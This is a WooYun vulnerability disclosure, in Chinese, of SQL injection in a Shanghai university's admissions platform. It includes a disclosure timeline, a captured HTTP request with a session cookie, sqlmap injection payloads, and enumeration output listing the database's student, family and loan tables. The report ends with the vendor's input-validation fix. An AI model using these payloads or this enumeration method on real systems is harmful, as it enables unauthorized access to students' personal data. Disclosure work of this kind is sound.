乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
RT
http://ygzs.shutcm.edu.cn/ 上海中医药大学阳光招生信息平台
POST /Pages/EnrolRegistUpGradeScore.aspx HTTP/1.1Content-Length: 429Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://ygzs.shutcm.edu.cnCookie: ASP.NET_SessionId=dzywts5rl2aqqidbfpvwlz5m; CNZZDATA1254023599=1912620956-1449309629-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1449309629; bdshare_firstime=1449310636107Host: ygzs.shutcm.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKYoPnfBgK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8%2b4K2aAdHUn7sWQjApfH5/KQWD2geJ03DnGCoV5QDGbcFb0%3d&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWAgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZGRAMQgveRc08S8Pa8khCOyeKCo839CL2vVMzZPZNr%2bDIQ%3d%3d
txtCkbmh参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: txtCkbmh (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-2022' OR 5183=5183 AND 'HZWU'='HZWU&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg== Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: btnSearch=%e6%9f%a5%e8%af%a2&ddlYear=2015&txtCkbmh=-1' AND 7827=CTXSYS.DRITHSX.SN(7827,(CHR(113)||CHR(113)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7827=7827) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(118)||CHR(113))) AND 'epVS'='epVS&txtIdenty=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKb0Zi6DwK71qnUAwL4wa6BDQKFpYVEApbO0uUEAqWf8+4Kkq1XaPXXQAhUQCaF0deJ50Ypwf2Bhx0+Jl/oDsZGFEM=&__VIEWSTATE=/wEPDwUKLTI0MjMxNTMyMA9kFgICAw9kFgICAw9kFgJmD2QWBgIBDxBkEBUCBuWFqOmDqAQyMDE1FQIABDIwMTUUKwMCZ2dkZAIJDw8WBh4EVGV4dAU65rKh5pyJ5om+5Yiw5Lu75L2V5L+h5oGvIO+8jOivt+ajgOafpei+k+WFpeaYr+WQpuacieivr++8gR4JRm9yZUNvbG9yCo0BHgRfIVNCAgRkZAILDxYCHglpbm5lcmh0bWxlZGQAqWXWR+u78GVYRmFz/ymcaJDlj16CEj9bWaAh+75jNg==---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 4.0.30128back-end DBMS: Oraclecurrent user: 'XUEGONG'current schema (equivalent to database on Oracle): 'XUEGONG'current user is DBA: Falseavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] OLAPSYS[*] SYS[*] SYSTEM[*] XDB[*] XUEGONG
Database: XUEGONG+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| LEAVESCHOOL_IMPORTDATA | 66726 || XSPY_STUDENTAPPRISE_DETAIL | 61996 || PROJECTQUALIFICATIONS | 30016 || TBMESSAGE | 29935 || STUDENTUSER | 12453 || STUBASIC | 12450 || ENROLREGISTERDATA | 12262 || STUFAMILY | 10962 || STUBASIC_SYNC | 10574 || STUBASICTEMP | 10019 || XSPY_STUDENTAPPRISE | 8853 || STUFAMILYTEMP | 8395 || TIMETABLE | 6816 || TBLDORMSTU | 6324 || TBLDORMAPP | 5777 || PROJECTAPPLICATION | 5533 || AWARDS | 3842 || STUXJYD | 3806 || TBPROVINCE | 3590 || STULEARNING | 3534 || STUFAMILYECOMSITUATION | 2984 || TBLDORMROOM | 2396 || STUFAMILYECOMSITUATIONTEMP | 2247 || NEWARRIVALBASIC | 1849 || RECIPIENTS | 1626 || POSTGRADUATE_STUBASIC | 1553 || LEAVESCHOOL_SUMMARY | 1355 || TBLHYGIENE | 1324 || TBKNSAPP | 1083 || TBNEWKNSAPP | 982 || INFORMATION | 840 || NEWARRIVALDORMARR | 800 || ENROLREGISTTAKINGCASESUMMER | 729 || TBROLE_ROLEMENU | 699 || TBKNSAPPHISTORY | 658 || ENROLSCORE | 632 || TBATTENCECERT | 606 || STUSTAYEDREG | 495 || ENROLUSER | 429 || TBCLASSHISTORY | 414 || TBBBXSZSQ | 255 || TBROLE_ROLEUSER | 241 || LEAVESCHOOL_BYHKQRREGIST | 237 || TBTEACHERS | 224 || XSPY_APPRISE_ITEM | 220 || TOURVISITED | 219 || TBCLASS | 154 || NEWARRIVALMASTER | 149 || TUANWEI_GROUPRELATIONSHIP | 144 || TBROLE_MENU | 140 || TBMAJORHISTORY | 137 || ENROLREGISTTAKINGCASE | 136 || TUANWEI_ZB | 135 || ENROLUPGRADEDSCORE | 134 || STUDENTMENUPERMISSION | 133 || TBTRAINTICKETSAPP | 133 || PROJECTCHARITYACTIVITIES | 131 || STUDENTNAVPERMISSION | 128 || STUBASIC_IMPORT | 123 || TBLDORMFLOOR | 118 || TBLACTROOMAPP | 115 || TBLACTROOMPLAN | 109 || ENROLDETAIL | 98 || LEAVESCHOOL_BDZIMPORT | 96 || PROJECTLEVEL | 90 || WORKFLOW_FLOW | 81 || STUDENTNAVMANAGE | 78 || TBADMISSIONMAJOR | 75 || ASKFORLEAVEAPP | 72 || TBDEPARTMENTHISTORY | 69 || LEAVESCHOOL_STUDENT_SFZMATCH | 62 || POSTGRADUATE_XY | 61 || TBMZ | 58 || PROJECTTABLE | 55 || ENT | 53 || POSTGRADUATE_MAJOR | 48 || JHSTUDENTLOAN | 41 || ENROLREGISTERFILE | 39 || TBMAJOR | 39 || ENROLMENU | 36 || ACTIVITY | 32 || FDY_RECORDFORCONTACTSTUDENT | 29 || TBATTENCECERTTEMP | 27 || TBROLE_ROLEGROUP | 26 || ENGLISHMAJOR | 24 || XUEKEANDZHUANYE | 24 || WORKFLOW_FORM | 21 || TBLDORM | 17 || TBXHCONFIG | 17 || MATCHXH | 15 || TBDEPARTMENT | 15 || FDY_TRAINNINGRECORD | 13 || TBTEACHERRYFL | 13 || TBZZMM | 13 || FDY_RECORDFORCONTACTFAMILY | 11 || TBLACTROOM | 11 || APPLICATIONHISTORY | 10 || FDY_BASICINFO | 10 || FDY_RECORDFORCONTACTTEACHER | 10 || POSTGRADUATE_XL | 10 || XSPY_ITEMS | 10 || ASKFORLEAVEAPPTEMP | 9 || FDY_RECORDFORCLASSMEET | 9 || LEAVESCHOOL_ITEM | 9 || LEAVESCHOOL_PARAMETERS | 9 || TBLREPAIRAPP | 9 || ENROLCONFIG | 8 || FDY_PUBLISHARTICLE | 8 || POSTGRADUATE_TRAIN | 8 || WORKFLOW_SETTINGS | 8 || ENROLTHREESCHOOLSCORE | 7 || FAMILYTYPE | 7 || FAMILYTYPETEMP | 7 || FDY_FDYAWARDS | 7 || FDY_RECORDFORVISITCLASSROOM | 7 || POSTION | 7 || TBKNBZ | 7 || ENROLREGISTERTABLE | 6 || ENROLTIMEPERIOD | 6 || FDY_RECORDFOREXAMSUPERVISOR | 6 || REGISTERPERIOD | 6 || ENROLBANNER | 5 || FDY_CLASSAWARDS | 5 || TBPYFS | 5 || TBXL | 5 || TUANWEI_ZW | 5 || ENROLBBTYZ | 4 || FDY_APPLYFORCOURSE | 4 || FDY_RECORDFOREDUCATIONACTIVITY | 3 || FDY_STUDENTAWARDS | 3 || POSTGRADUATE_XSZ | 3 || STUDENTFROMTYPEMANAGE | 3 || TABLE_ZB | 3 || TBPARA | 3 || XSPY_APPRISE | 3 || FDY_RECORDFORVISITDORMATORY | 2 || POSTIONHISTORY | 2 || TABLE_ZW | 2 || TBLOAN | 2 || CURRENTSEASON | 1 || FDY_RECORDFORSERIOUSEVENT | 1 || FDY_TEACHSITUATION | 1 || FDY_WORKIDEA | 1 || FDY_WORKSUMMARY | 1 || NEWARRIVALMASTERCATEGORY | 1 || TBQGPARA | 1 || TUANWEI_ROLE | 1 || WORKFLOW_TEMP | 1 || WORKLICENSE | 1 |+--------------------------------+---------+
危害等级:中
漏洞Rank:5
确认时间:2015-12-14 14:29
专升本成绩查询中,身份证的文本框加了正则验证,以及其他文本框如春招报名号加了数字验证
暂无